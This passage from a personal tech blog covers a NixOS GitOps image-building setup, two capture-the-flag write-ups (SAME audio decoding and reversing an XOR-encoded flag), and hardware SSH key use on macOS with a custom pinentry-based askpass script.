themselves. Now normally with Kubernetes that's not much of an issue, you typically just deploy to cloud ephemeral nodes and then most of the complicated stuff is handled on the backend. In a homelab though, everything is on-prem, and the real cloud is the lessons you learn along the way. But NixOS seemed like a chance to change this, the whole operating system defined by a config file. I had some pre-conceived notions about how I figured NixOS would work. That is probably the real lesson in this: I took knowledge of how technologies like FluxCD worked and figured that another technology, i.e. NixOS, would work in a similar fashion. The reality of the matter is that NixOS is more akin to a normal Linux distribution than I thought... But you can change this, and I can explain how I did it. What I Wanted</h3> I should probably start by describing what I expected and wanted out of NixOS. I wanted a way to turn a configuration defined in a Git repository into a disk image that the computer could boot from without any other changes and then anytime I pushed changes to the Git repository, the computer would apply that configuration. This is similar to how FluxCD works, you create a configuration, run a quick flux bootstrap</code> command, and then the cluster tracks the repository. The Reality</h3> How NixOS works by default cannot accomplish this. You run the installer similar to how you install any other distribution like Ubuntu or Fedora, and it generates a config file for you along with some hardware specific bits. You then edit this config to add things to the OS, but its not really tracked anywhere by default, nor is there an easy way to pull that from anywhere. The Flexibility of nix</h2> The neat thing about NixOS is also the really obnoxious part about it: it's built on top of the nix programming language which is a "domain-specific, purely functional, lazily evaluated, dynamically typed programming language."</a> What that means is that you can do basically anything as long as you can program it in nix. And all of this revolves around nix the package manager. So the functionality is there; just waiting for someone to program and build it. Feature Overload</h3> Now I must address my real issue with NixOS: "experimental features." Almost any blog post you read about NixOS tells you to enable Nix Flakes. But as soon as you go to the NixOS wiki it tells you: "Nix flakes is an experimental feature of the Nix package manager."</a> And then clicking the link for "experimental features" tells you from the NixOS manual "Experimental features are considered unstable, which means that they can be changed or removed at any time."</a> But everywhere you go it tells you to enable flakes, and everyone that uses flakes will defend them. To me this just seems like nix/NixOS doesn't want to embrace their own tools. The real issue I have with this is that it makes the documentation really hard to follow because to do what I was trying to accomplish I was forced to use flakes, but the people that write the documentation don't really seem to want to promote flakes although the rest of the internet does. I understand aversion to change, but when the whole of the internet uses your ecosystem in your "experimental" way, at some point you need to accept it's no longer experimental and embrace/support it as well for the betterment of your project. Now back to the story. Finding the solution</h3> I stumbled my way through the pages of Google to nixos-generators</a>: a project that allows you to take a NixOS config and generate a bootable disk image (or installer?). This seemed almost perfect to what I needed minus the syncing with the git repository. But this project also presented with a weird issue: after you generate the image, you could no longer apply updates to your configuration via nixos-rebuild switch</code>... Which is the only way to update the configuration. At this point, I was really confused. It almost seemed like what I wanted didn't exist. I really didn't want to have to take my servers and plug them into a monitor and keyboard or SSH into an installer to finish installing them. I just wanted to plug the SSD into my computer run dd</code>, plug it back into my server, and have it boot to known good. In fact, I need this as I constantly break things and don't want to waste time re-installing the OS when it can be done automatically. Then I found an issue on the nixos-generators website that told me what I wanted to see: link to the issue</a>. This comment by GitHub user @JustinLex</a> described having two outputs of a nix flake, one for the generator and one for the OS configuration. You then had to make a custom file that described the boot disks and add it to your OS configuration so that the bootloader was actually setup properly on a nixos-rebuild switch</code> as well as add a system.autoUpgrade</code> block to your configuration that updated from your flake. Now I had what I needed! And this highlights a huge win for NixOS: the community is amazing and finds ways to make things work. It just confuses me how the community can be this awesome and simultaneously the project doesn't seem to have good support or documentation. Managing Secrets</h2> So now I had a way to generate a disk image from a git repository and then the system will auto-apply the repository configuration weekly. Perfect? Almost. The last thing I needed was a way to inject secrets into the image. The reason for this is 1) I wanted my git repository to be private and 2) I needed a way to add the k3s cluster token to all three nodes. The NixOS Way (TM)</h3> It seems like the NixOS way is documented in this page</a>. Basically, most of the community seems to want to use either agenix</a> or sops-nix</a> and while these seemed like fine ideas, they were opposite of what I wanted for my project. The first issue is that I don't want to store encrypted blobs in my git repository. I know its probably secure, but I'd just rather not if I can help it when better solutions exist like a password manager or secrets manager. The second issue is related to the first: if you are going to encrypt the secrets, that necessitates decrypting them somehow. Which means somehow you have to have a secret which is either generated per-machine (i.e. a manual process) or shared via symmetric key (i.e. another secret that cannot be encrypted itself and we begin recursion here?). What I Wanted</h3> All I really wanted was a way to create files with secrets on the generated disk image that were only readable by root. They wouldn't be stored in the git repository, and I would only need to inject them once in some automated form. Now, you might argue that its bad to have plaintext secrets on disk, and to that I would argue that unless you're storing the encryption keys in the TPM of the computer or some hardware module, there's not much difference to having encrypted secrets on disk because they have to be decrypted at some point and the encryption key has to also be on disk in some form at that point. The Issue</h3> My first attempt at this was to simply see if I could somehow create the files in the configuration passed to nixos-generators and then it would just be there. I accomplished this after a lot of trial and error with a weird shell script and readFile</code> calls in the nix configuration. The first issue with this is that a) its stored in the nix store which is world readable for some reason and b) when you run nixos-rebuild</code> it just deletes the files since it's not present in the OS configuration. So then I added readFile</code> calls in the OS configuration pointing to the files I created via the nixos-generators configuration. But this led to an issue: nix flakes have to be able to be built without outside resources and doing it this way was considered "unpure". Now I could have just lived with an impure flake, but I also wasn't super happy about my janky shell script system. My Solution</h3> What I ended up realizing was that since I could generate a disk image, I could also mount the disk image and create any files I wanted on it and treat it like a normal system. So my solution was actually to just use Ansible in conjunction with local actions to create files on the disk. This seemed like a great solution for me because I can also re-use the playbook after the systems are stood up and rotate my secrets with minimal effort. With the secrets on disk, you just have to use the corresponding file directives in the nix configuration such as hashedPasswordFile</code>. Putting it All Together</h2> The last piece of the puzzle is that I wanted to decouple the functions that create the specific configurations for nixos-generators and the OS configurations. There really was no reason for this other than I wanted a way to re-use the functionality in a different flake in the future. This led me to try to figure out how flakes and subflakes worked, which led to a new issue: I'm really out of practice in functional programming. So by lots of trial and error and hard lessons with cryptic errors such as "error: cannot coerce a set to a string" and trying to figure out how list and set merging actually worked, I created nixos-gitops</a> which makes it simpler to do what I did. To wrap it all up, I also was able to enable Mend Renovate</a> on the repository to update the flake.lock file, create a pull request, and thus have a way to weekly upgrade my nodes with a manual review process. This also enables you to quickly rollback to a known good, and if for some reason the nodes are completely trashed, I just have to re-image a few disks and then everything is fine again. My Thoughts</h3> I really do like my new setup. NixOS is definitely an upgrade to manually configuring Linux systems and in the future I'll probably start using it on my host system as well. Once you get a setup working, it continues to work and seems to be rock solid and minimal, similar to a container runtime, which I like. My Complaints</h3> The project maintainers need to embrace the way that their userbase is actually using their project. What I mean by that is build the relevant documentation that will present users with the best/modern way to use nix/NixOS. Also, I would love if the project evolved to have the functionality of nixos-generators built in. Why would you need an installer for an OS that runs off of a configuration file when you already have the configuration file? I think the reason they do not currently do this is that they market the OS for personal workstation use, but I think they are missing a huge market share by doing this. Being able to define configurations that generate golden images for servers and workstations or VDI is amazing. Imagine if you could take your NixOS flake in a git repo and simply do nix image build --flake <repo> --out disk.img</code> and you're done. You would not need any of this weird bandaid flake code I had to write to get the OS and the generator flake to work together. In Closing</h2> I don't want anyone to get the wrong idea about my feelings towards NixOS: I absolutely love the technology. I just think it could be so much more and be a better experience for end users. Rant over. Thank you if you actually read the post and didn't just rush to the comments to call me a noob (although you wouldn't be wrong). Tornado Writeup 2023-07-03T08:45:00-05:00 Tornado was a misc challenge from UIUCTF 2023</a> that involved a singular wav file with the hint that it was encoded using SAME encoding. If you want to learn more about this encoding, you can read some more here</a>, but essentially it boils down to being the way that emergency weather alerts are sent within the US (and other some other countries as well). Upon doing some research on how to actually read this file, I came across sameold</a> which contains a SAME decoder, samedec, written in rust, meant to be used with a Raspberry Pi or PC to receive these emergency alerts. It took a little bit of trial and error to realize that there is a specific way to read in wav files: sox 'Same.wav' -t raw -r 22.05k -e signed -b 16 -c 1 - | samedec -r 22050</code></pre> I probably would've figured this out a lot sooner if I actually read the README. Anyways, if you're on Kali (or probably most distros) you can install sox with a quick: apt install sox</code></pre> If you run samedec with no flags, it will just figure out the actual SAME message: ZCZC-WXR-TOR-018007+0045-0910115-KIND/NWS-</code></pre> Which is not what we want. (Fun fact: the message is a tornado warning for Benton County Indiana from April 1st, effective from 1:15AM to 2:00AM UTC) So instead, we add the -v flag to get more info and it will actually give us the bits we need to decode the flag: /home/kali/CTF/UIUCTF23/misc/tornado [git::uiuctf23 *] [kali@kali] [18:54] > sox warning.wav -t raw -r 22.5k -e signed -b 16 -c 1 - | ./samedec-x86_64-unknown-linux-gnu -r 22050 -v INFO samedec > SAME decoder reading standard input INFO sameold::receiver > [1400 ]: event [link]: searching INFO sameold::receiver::framing > burst: started: after 20 bytes INFO sameold::receiver > [7992 ]: event [link]: reading INFO sameold::receiver > [22467 ]: event [link]: decoded burst: "ZCZC-UXU-TFR-R18007ST_45-0910BR5-KIND3RWS-" INFO sameold::receiver > [22467 ]: event [transport]: assembling INFO sameold::receiver > [22488 ]: event [link]: no carrier INFO sameold::receiver > [44369 ]: event [link]: searching INFO sameold::receiver::framing > burst: started: after 19 bytes INFO sameold::receiver > [50614 ]: event [link]: reading INFO sameold::receiver > [65087 ]: event [link]: decoded burst: "ZCZC-WIR-TO{3018W0R+00T5-09UT115-K_EV/NWS-" INFO sameold::receiver > [65108 ]: event [link]: no carrier INFO sameold::receiver > [86644 ]: event [link]: searching INFO sameold::receiver::framing > burst: started: after 20 bytes INFO sameold::receiver > [93236 ]: event [link]: reading INFO sameold::receiver > [107708 ]: event [link]: decoded burst: "ZCZC-WXRCTOR-0D_007+004OR_O1011E@KIND/N}S-" INFO sameold::receiver > [107729 ]: event [link]: no carrier INFO sameold::receiver > [136628 ]: event [transport]: message: (100.0% voting, 120 errors) "ZCZC-WXR-TOR-018007+0045-0910115-KIND/NWS-" ZCZC-WXR-TOR-018007+0045-0910115-KIND/NWS- INFO sameold::receiver > [136671 ]: event [transport]: assembling INFO sameold::receiver > [347741 ]: event [transport]: idle INFO sameold::receiver > [2006035 ]: event [link]: searching INFO sameold::receiver::framing > burst: started: after 20 bytes INFO sameold::receiver > [2012622 ]: event [link]: reading INFO sameold::receiver > [2013916 ]: event [link]: decoded burst: "NNNNfff" INFO sameold::receiver > [2013916 ]: event [transport]: message: (0.0% voting, 0 errors) "NNNN" NNNN INFO sameold::receiver > [2013937 ]: event [link]: no carrier INFO sameold::receiver > [2013937 ]: event [transport]: assembling INFO sameold::receiver > [2035822 ]: event [link]: searching INFO sameold::receiver::framing > burst: started: after 19 bytes INFO sameold::receiver > [2042061 ]: event [link]: reading INFO sameold::receiver > [2043355 ]: event [link]: decoded burst: "NNNNfff" INFO sameold::receiver > [2043377 ]: event [link]: no carrier INFO sameold::receiver > [2064914 ]: event [link]: searching INFO sameold::receiver::framing > burst: started: after 20 bytes INFO sameold::receiver > [2071503 ]: event [link]: reading INFO sameold::receiver > [2072798 ]: event [link]: decoded burst: "NNNNfff" INFO sameold::receiver > [2072819 ]: event [link]: no carrier</code></pre> That gives us three different messages: ZCZC-UXU-TFR-R18007ST_45-0910BR5-KIND3RWS- ZCZC-WIR-TO{3018W0R+00T5-09UT115-K_EV/NWS- ZCZC-WXRCTOR-0D_007+004OR_O1011E@KIND/N}S-</code></pre> If you look closely, you can probably already see the flag, but the trick is to grab the unique character at each position out of the three strings. I wrote this quick python script to recover it: a = "ZCZC-UXU-TFR-R18007ST_45-0910BR5-KIND3RWS-" b = "ZCZC-WIR-TO{3018W0R+00T5-09UT115-K_EV/NWS-" c = "ZCZC-WXRCTOR-0D_007+004OR_O1011E@KIND/N}S-" d = "" for x in range(len(a)): # Grab the character at this position from all three strings chars = [a[x], b[x], c[x]] # Convert the list to a set which will filter out duplicates # and then back to a list so we can use indices to access it uniq = list(set(chars)) # If there is only one uniq character then add it if len(uniq) == 1: d += uniq[0] continue # Check how many times the first item in the list appears in the # three strings, if it appears once then its the unique character if chars.count(uniq[0]) == 1: d += uniq[0] # If it appears more than once than the other character is the unique one else: d += uniq[1] print(d)</code></pre> And we get the flag: ZCZC-UIUCTF{3RD_W0RST_TOR_OUTBRE@K_EV3R}S-</code></pre> I enjoyed this challenge and while the solution is simple to explain, it took quite a bit of time to find the correct tool and figure out how to actually get the flag. Let me know in the comments if you found a better way to do it or if you have something to add! Hardware SSH Keys on macOS 2023-06-11T13:00:54-05:00 Last year, I wrote a blog post about hardware SSH keys on Windows and WSL. This year, I am running macOS full time, and have recently dealt with similar issues, and again had difficulty finding information on this topic on the internet. Most of the solutions I've seen involve creating custom launchd scripts or similar and seem like a bit of a hacky solution. While this solution I am about to present is also slightly hacky, it definitely feels more streamlined to use than any other solution I've seen and even includes support for saving the pin in Apple Keychain! So without any further fluff, lets get to it. The Problem</h2> Let me first frame the problem so you understand why I am writing this post. macOS SSH</h3> When you use SSH on a stock brand new install of macOS, you may think that hardware SSH keys of the type "-sk" are supported out of the box. Running ssh -V shows the following: $ /usr/bin/ssh -V OpenSSH_9.0p1, LibreSSL 3.3.6</code></pre> This is a relatively recent build of OpenSSH. You would think it supported these types of SSH keys, and while it should, Apple chose to build it without support for them for whatever reason. If you try to add one to the built in ssh-agent, you might see the following: $ ssh-add ~/.ssh/id_ed25519_sk Could not add identity "/Users/astr0n8t/.ssh/id_ed25519_sk": agent refused operation</code></pre> And from the ssh-agent logs you will see: process_add_identity: parse: unknown or unsupported key type</code></pre> So this is the sad state of OpenSSH by default on macOS. Hardware key types are strictly not supported out of the box. Homebrew to the Rescue</h3> It honestly annoyed me that the keys aren't supported out of the box, but thankfully, homebrew will help us out here. Just do the following to get actual OpenSSH: brew install openssh </code></pre> This will install the binaries to /usr/local/bin</code> instead of /usr/bin</code>. Checking the version gives you the following: $ /usr/local/bin/ssh -V OpenSSH_9.3p1, OpenSSL 1.1.1u 30 May 2023</code></pre> Now, lets check how hardware SSH keys work with this version. First, disable the built in ssh-agent: launchctl disable user/$UID/com.openssh.ssh-agent</code></pre> Second, start the OpenSSH ssh-agent: $ /usr/local/bin/ssh-agent -D</code></pre> The '-D' flag tells ssh-agent not to fork so we can see the output. Copy the first line which sets the SSH_AUTH_SOCK</code> variable and paste it into another terminal. In that terminal, now try to add your key: $ ssh-add ~/.ssh/id_ed25519_sk Identity added: /Users/astr0n8t/.ssh/id_ed25519_sk (ssh:)</code></pre> It works! And now, lets try to actually use the key in some method: ssh host sign_and_send_pubkey: signing failed for ED25519-SK "/Users/astr0n8t/.ssh/id_ed25519_sk" from agent: agent refused operation host's password: </code></pre> Hmm, that's not too good. If we look at the logs for ssh-agent, we can see why: Confirm user presence for key ED25519-SK SHA256:S4Hedoz6ovjA4g5Kg1RyLAEDF0g6gahFRrnEPkN5RXw process_sign_request2: sshkey_sign: incorrect passphrase supplied to decrypt private key</code></pre> Essentially, ssh-agent does not know how to ask us for our pin. Quick Solution without ssh-agent</h2> There is a simple solution actually, if you just want a quick and dirty way to get your key working. Kill the ssh-agent process and try again: $ ssh host Confirm user presence for key ED25519-SK SHA256:S4Hedoz6ovjA4g5Kg1RyLAEDF0g6gahFRrnEPkN5RXw Enter PIN for ED25519-SK key /Users/astr0n8t/.ssh/id_ed25519_sk: Confirm user presence for key ED25519-SK SHA256:S4Hedoz6ovjA4g5Kg1RyLAEDF0g6gahFRrnEPkN5RXw User presence confirmed</code></pre> Hey that worked! Caveats</h3> Now, this does work, and I actually was using this for many months with no issues. The main caveat is that you have to either specify the key with -i</code> or name it one of the standard key names such as id_ed25519_sk</code>. If you are happy with that, its a simple solution that should just work with the OpenSSH homebrew. If you want a proper ssh-agent, keep reading. Better Solution with ssh-agent</h2> Recently though, I wanted to be able to use a proper ssh-agent so I could forward it over SSH and for devcontainers. Getting this to work actually took quite a bit of learning and understanding what is happening here. First things first, you want to actually start ssh-agent. I do this by enabling the ssh-agent</code> plugin in oh-my-zsh. You can also do this by starting it in your profile script. Now essentially, ssh-agent does not know two things. The first is it does not know how to ask us for our pin. The second is it does not know where to ask us for our pin. The How</h3> The how is actually pretty simple, and you might have already stumbled upon a similar solution on the internet. ssh-agent relies on the SSH_ASKPASS</code> variable to know what program to call to get a password from a user when it is not running within a TTY. If you install a ssh-askpass program and set this variable, ssh-agent will now know how to ask you for your pin. (This will work if you run it with -D</code>, but it will prompt you in the terminal session where ssh-agent is running, not SSH itself) The Where</h3> The last bit of the puzzle is telling ssh-agent where to ask. Now, ssh-agent by default is not run with the '-D' flag. This means that it forks, and runs in the background, without a proper TTY. Because of this, it might not be able to send you the request for your pin because it doesn't know where to send it. The solution is to use a graphical ssh-askpass program, and to set the DISPLAY</code> environment variable. The DISPLAY</code> environment variable tells ssh-agent that it can simply launch the program specified by the SSH-ASKPASS</code> variable, and the program will be displayed to the user. If you want a quick ask-pass program, you can use this one on GitHub: https://github.com/theseal/ssh-askpass which is fairly basic. Once you install that, and set the following environment variables: export SSH_ASKPASS=/usr/local/bin/ssh-askpass export DISPLAY=":0"</code></pre> If you are using oh-my-zsh make sure to place these lines before your zshrc sources oh-my-zsh so ssh-agent gets called with them. You will get the following prompt regardless of how you started ssh-agent (as long as it sees the environment variables): So once again, this is a valid solution, and you can be satisfied with it. Custom Solution with ssh-agent and Keychain Support</h2> At this point, I started to wonder, what does a ssh-askpass program actually entail. It turns out, it just needs to print the password when called. Nothing fancy. I then decided that I wanted to find a better tool for the job then this ssh-askpass program. I then stumbled accross pinentry. pinentry</h3> The pinentry suite is a collection of tools that are written for gpg. All they do is ask the user for their pin which seemed to fit since that is all I needed as well. The source can be found here https://github.com/GPGTools/pinentry on GitHub. It turns out that the macOS variant also supports storing the pin in Apple Keychain, and on top of that, this person wrote a version which supports using your fingerprint to unlock it as well: https://github.com/jorgelbg/pinentry-touchid. I found this pretty cool, but more importantly, I figured these projects are better supported than the ssh-askpass one. You can install pinentry-mac with brew: brew install pinentry-mac</code></pre> So I set off to write my own wrapper around this application, which actually wasn't too difficult. I found this excellent blog post which helped me understand the protocol that these programs use: https://velvetcache.org/2023/03/26/a-peek-inside-pinentry/ I was then able to discern that if you simply send the "GETPIN" command to the program, it would prompt for the pin and return it. The output returned needs to be filtered a bit, but that is simple enough with some Google and bashfu. At this point, I had created a nice script that worked reliably, but it was lacking the ability to save the pin to keychain. Final Solution</h3> Researching online gave me that there were two commands needed to enable support for Keychain, and that it had been disabled by default since it really shouldn't be enabled unless the individual wants it to be: defaults write org.gpgtools.common UseKeychain -bool yes defaults write org.gpgtools.common DisableKeychain -bool no</code></pre> These should enable you to select to save the pin in Keychain, but I still did not see the option. After about an hour of perusing the source code of pinentry-mac, I finally discovered why. If I was actually using GPG with this utility, I would've seen the option, but the option relies on the KEYINFO about the key that the passphrase is requested for in order to identify the key later. This makes sense. The program needs a KEYID to know what to name and reference the pin by later. Thankfully, from the previously mentioned blog post, I was able to find the command SETKEYINFO</code> and OPTION allow-external-password-cache</code> which would allow it to be saved in Keychain. I had to do some string manipulation to send the SHA256 of the key with the SETKEYINFO</code> command, but then it just works. We get the following prompt now: And selecting to save in keychain will create a new GnuPG</code> item in our keychain with our key's pin. Using that, now when we go to use our key, all we need to do is tap the key itself (assuming you have required both pin and presence when creating the resident SSH key). The full ssh-askpass script can be found below: #!/bin/bash # # Can enable check to enable keychain # I've disabled this by default # It only needs to run once CHECK_KEYCHAIN_ENABLE=1 if [ $CHECK_KEYCHAIN_ENABLE -eq 0 ] then USE_KEYCHAIN=$(defaults read org.gpgtools.common UseKeychain) if [ $USE_KEYCHAIN -eq 0 ] then defaults write org.gpgtools.common UseKeychain -bool yes fi DISABLE_KEYCHAIN=$(defaults read org.gpgtools.common DisableKeychain) if [ $DISABLE_KEYCHAIN -eq 1 ] then defaults write org.gpgtools.common DisableKeychain -bool no fi fi # We want to ignore confirmations for user presence if [[ "$1" == "Confirm user presence"* ]] then echo else # See if we can get the hash of the key # that we want the password for # (this enables keychain option support) HASHTYPE=$(echo $1 | awk -F':' '{print $1}') if [[ "$HASHTYPE" == *"SHA256" ]] then # Grab the actual hash SHA256=$(echo $1 | awk -F':' '{print $2}') PROMPT="SETDESC $1\nOPTION allow-external-password-cache\nSETKEYINFO $SHA256\nGETPIN" else # Otherwise don't include the keyinfo PROMPT="SETDESC $1\nGETPIN" fi # Prompt the user for their pin PIN=$(echo -e $PROMPT | pinentry-mac | grep D | tr -d '\n') # Return the pin to ssh-agent starting after 'D ' echo "${PIN:2}" fi</code></pre> Simply save this somewhere, make it executable, and set the SSH_ASKPASS</code> variable to point to it. And a bonus, you can edit and customize this script to your heart's content. Enjoy, and feel free to leave a comment or suggestion on how to improve the script! Common Sense Writeup 2023-04-17T18:45:00-05:00 Common Sense was the only reverse engineering challenge in Virginia Tech's online 2023 SummitCTF competition. I spent roughly five of the eight hours of the competition working on this challenge and was only finally able to solve it five minutes after the competition ended. The challenge simply provided two files: a.out and flag.txt. flag.txt</h2> As you can see below, flag.txt is a string of characters which don't make a lot of sense on their own. ;]|^_j8d9YOZ;mrI]F=|:P5^iP7IPIKF4\4IPI5AUb99 </code></pre> I initially suspected some type of xor operation happening here, but I would not be able to confirm that for a while. a.out</h2> Looking at the file a.out, it appeared to be an ELF binary, and running it simply resulted in a segmentation fault. Opening it up in Ghidra revealed that it was in fact an ELF binary with debugging symbols stripped in order to increase the difficulty to reverse it. Finding main</h3> The first thing to do with such a binary is locate the syscall to libc_start_main which will inform us as to the location of the main function. Using the Ghidra decompiler and walking through the various functions, eventually we reach the following: void FUN_001010d0(undefined8 param_1,undefined8 param_2,undefined8 param_3) { undefined8 unaff_retaddr; undefined auStack_8 [8]; __libc_start_main(main,unaff_retaddr,&stack0x00000008,0,0,param_3,auStack_8); do { /* WARNING: Do nothing block with infinite loop */ } while( true ); }</code></pre> In this case, I renamed the main function to simply "main", but you can see that in the function parameters to libc_start_main, that the first argument will be the name of the main function. Reversing main</h3> main.c</h4> When I initially looked at the decompiled main function, it was very confusing. Ghidra had wrongly guessed about quite a few different data types and all of the functions and variables lacked helpful names. I spent some time walking through the function and cleaning it up to where it made sense, and I could begin to understand it. As you can see below, the purpose of main is to check a string against quite a few different things. int main(int argc,char **argv) { int return_code; char flag_buffer [52]; int flag_equal; FILE *flag_fd; char third_and_fifth; int odd_xor; int check_high_bits; char greater_than_7; greater_than_7 = check_if_arg1_greater_than_7(argc,argv); check_high_bits = check_size_arg1(argv[1]); if ((greater_than_7 == 1) && (check_high_bits != 0)) { odd_xor = check_odd_bitwise_and(argv[(long)argc + -1]); third_and_fifth = add_char_4_and_2(argv[1]); if ((odd_xor == 0) && (third_and_fifth == 'm')) { if (((argv[1][6] < '\"') || ('.' < argv[1][6])) || (argv[1][7] != '0')) { return_code = 1; } else { flag_fd = fopen("flag.txt","r"); fgets(flag_buffer,0x2e,flag_fd); flag_equal = compare(flag_buffer,argv[1],1); if (flag_equal == 0) { decode_msg(); return_code = 0; } else { return_code = 1; } } } else { return_code = 1; } } else { return_code = 1; } return return_code; }</code></pre>check_if_arg1_greater_than_7.c</h4> The first function call which you can see below, ensures that there is exactly one argument supplied to the function and that it is a string of more than seven characters. size_t check_if_arg1_greater_than_7(int argc,char **argv) { size_t len_arg1; if (argc == 2) { len_arg1 = strlen(argv[1]); if (7 < len_arg1) { len_arg1 = 1; } } else { len_arg1 = 0; } return len_arg1; }</code></pre>check_size_arg1.c</h4> The second function call checks if length of the string argument is an integer with all bits from the third and upward are set. The easiest length to use to satisfy this requirement is eight characters since that will be "1000" in binary which will simply be "1" when bit shifted by three. uint check_size_arg1(char *arg1) { size_t size_arg1; size_arg1 = strlen(arg1); return (uint)(size_arg1 >> 3) & 1; }</code></pre>check_odd_bitwise_and.c</h4> The next check looks at four different characters in the argument string to see if the last bit of their ascii code is a 0. An ascii character that satisfies this requirement is simply ascii "0". int check_odd_bitwise_and(char *string) { int return_code; if ((*string & 1U) == 0) { if ((string[1] & 1U) == 0) { if ((string[3] & 1U) == 0) { if ((string[5] & 1U) == 0) { return_code = 0; } else { return_code = 1; } } else { return_code = 1; } } else { return_code = 1; } } else { return_code = 1; } return return_code; }</code></pre>add_char_4_and_2.c</h4> The next check calls a function that adds the third and fifth characters together. The main function is checking if these equal the value for the ascii code of "m". Two characters that satisfy this requirement are "0" and "=". int add_char_4_and_2(char *string) { return (uint)(byte)string[4] + (uint)(byte)string[2]; }</code></pre>final_check.c</h4> The last check of the argument string is checking if the seventh char is between the ascii characters quote and period. A simple character that satisfies this is "#". It is also checking if the eighth character is simply "0". if (((argv[1][6] < '\"') || ('.' < argv[1][6])) || (argv[1][7] != '0')) {</code></pre>compare.c</h4> Once that set of checks is complete, the main function looks at the flag.txt file in the current directory. It uses the function below to compare it to the static string. void compare(char *param_1) { strcmp(param_1,";]|^_j8d9YOZ;mrI]F=|:P5^iP7IPIKF4\\4IPI5AUb99\n"); return; }</code></pre> One thing to note here is that the flag.txt provided had CRLF line endings when this check is for LF endings, so it needs to be converted using tr or a similar program. decode_msg.c</h4> Once all of these checks are satisfied the program will call the following function: void decode_msg(void) { printf("You can now decode the flag!"); return; }</code></pre> In order to get this, I simply used the string "0000=0#0": $ ./a.out '0000=0#0' You can now decode the flag!</code></pre>Reversing something?</h3> At this point, you might have noticed that we have an eight character string that doesn't really do much. I attempted to use it to xor the flag, but unfortunately this got me nowhere. It took me a lot of time at this point and a quick message to the challenge author to realize I needed to move onto some of the other functions in a.out. Now, there were about ten functions in the file which were extremely similar only differing on one line. These functions were not called anywhere else though. encode.c</h4> After a quick read through, I realized these functions were actually performing xor operations, so my guess was that one was used to encode the flag. I spent some time going through one and renaming and retyping variables until it made sense as you can see below: void encode(char *flag,char *key) { int len_first_half; int len_second_half; size_t length; char *first_half; char *second_half; int k; int j; int i; char current_char_first_half; char current_char; i = 0; while( true ) { length = strlen(flag); if (length <= (ulong)(long)i) break; current_char = flag[i]; flag[i] = flag[(long)i + 1]; flag[(long)i + 1] = current_char; i = i + 2; } puts(flag); length = strlen(flag); len_first_half = (int)length / 2; len_second_half = (int)length - len_first_half; first_half = (char *)malloc((long)(len_first_half + 1)); memcpy(first_half,flag,(long)len_first_half); first_half[len_first_half] = '\0'; second_half = (char *)malloc((long)(len_second_half + 1)); memcpy(second_half,flag + len_first_half,(long)len_second_half); second_half[len_second_half] = '\0'; j = 0; while( true ) { length = strlen(first_half); if (length <= (ulong)(long)j) break; current_char_first_half = first_half[j]; length = strlen(key); first_half[j] = current_char_first_half ^ (byte)length; j = j + 1; } k = 0; while( true ) { length = strlen(second_half); if (length <= (ulong)(long)k) break; second_half[k] = second_half[k] ^ key[4] + key[2] + 0x97U; k = k + 1; } first_half = strcat(first_half,second_half); printf("%s",first_half); return; }</code></pre> This is a lot to digest, but let's start at the beginning. char_swap.c</h4> This code is simply iterating over the first string argument to the function, stepping two characters at a time. It then swaps the characters so "abab" becomes "baba". i = 0; while( true ) { length = strlen(flag); if (length <= (ulong)(long)i) break; current_char = flag[i]; flag[i] = flag[(long)i + 1]; flag[(long)i + 1] = current_char; i = i + 2; }</code></pre>string_split.c</h4> The following code snippet looks really complicated and confusing, but it's literally just splitting the flag in half into two strings. length = strlen(flag); len_first_half = (int)length / 2; len_second_half = (int)length - len_first_half; first_half = (char *)malloc((long)(len_first_half + 1)); memcpy(first_half,flag,(long)len_first_half); first_half[len_first_half] = '\0'; second_half = (char *)malloc((long)(len_second_half + 1)); memcpy(second_half,flag + len_first_half,(long)len_second_half); second_half[len_second_half] = '\0';</code></pre>first_half.c</h4> The first following while loop operates on the first half of the flag. It simply xors each character with the length of the second string argument to the function. Based on the code in the main function, I just assumed this length to be eight (mainly I took that the last index checked was 7 which means the key only cares about the first eight characters). j = 0; while( true ) { length = strlen(first_half); if (length <= (ulong)(long)j) break; current_char_first_half = first_half[j]; length = strlen(key); first_half[j] = current_char_first_half ^ (byte)length; j = j + 1; }</code></pre>second_half.c</h4> The next while loop works with the second half of the flag. It xors each character with the sum of the third and fifth characters in the key combined with "+ 0x97U". This is actually not the correct formula... Or it is... Ghidra is really confusing here, but if you look at the actual assembly, it turns out what is actually happening here is that instead of adding 0x97, the program is subtracting 0x69 from this value. It is ultimately a lesson in that Ghidra is not always correct in how it decompiles things. k = 0; while( true ) { length = strlen(second_half); if (length <= (ulong)(long)k) break; second_half[k] = second_half[k] ^ key[4] + key[2] + 0x97U; k = k + 1; }</code></pre> This is also where each function in the a.out file differ. Each function had a different value for which characters from the key are used to xor the second half of the flag. But if you remember from main, it is checking if the third and fifth (index 2 and 4) characters add up to ascii "m", so my guess here is that this is the correct value for the xor. The value for the xor here is actually static. From main, we know that these two characters add up to ascii "m" and then just subtract 0x69 to get "0x4" or literally 4 in base 10. last_bit.c</h4> The last little snippet of this function is just concatenating the two halves of the flag again and printing it. first_half = strcat(first_half,second_half); printf("%s",first_half); return;</code></pre>solve.py</h2> So now, armed with the information that the flag has every character flipped, and that the first half is xor'd with 8 and the second half is xor'd with 4, we can decode the flag! I wrote the following little python script to do it. It just opens the flag file, swaps the characters back and then performs the correct opposite xor operation on each half of the flag. #!/usr/bin/env python3 from math import floor import base64 flag_txt_1 = open('flag.txt', 'r').read() flag_txt = '' for x in range(1,len(flag_txt_1),2): flag_txt += flag_txt_1[x] flag_txt += flag_txt_1[x-1] key = '0000=0#0' pairs = (2,4) length = floor(len(flag_txt) / 2) flag = '' for x in range(0, length): flag += chr(ord(flag_txt[x]) ^ len(key)) # literally 8 for x in range(length, len(flag_txt)): flag += chr(ord(flag_txt[x]) ^ ord(key[pairs[0]]) + ord(key[pairs[1]]) - 0x69) # literally 4 print(base64.b64decode(flag).decode())</code></pre> When done you can run the script and you will get the flag: $ ./solve.py SummitCTF{p35Ky_fuNc710N_C4115}</code></pre> I enjoyed this challenge even though I wasn't able to solve it before the CTF ended. Looking back on it now, it was a lot simpler than I made it, but I'll take it as a learning opportunity and try to not over complicate similar problems in the future. Thanks for reading! Hardware SSH Keys on Windows and WSL 2022-11-08T18:38:44-05:00 I recently acquired a hardware security key which has the ability to store SSH keys of the type ed25519-sk. I thought this was useful, as an issue if you use multiple operating systems is always having access to your SSH keys. Unfortunately, while I found the native Linux commands to set this up, I didn't find much support on how to do this properly on Windows or WSL. Luckily for you, I found a way to make it work natively in Windows and also with WSL. This works remarkably well, and Windows even stores your SSH key password in its keychain so you don't need to manually add keys to SSH 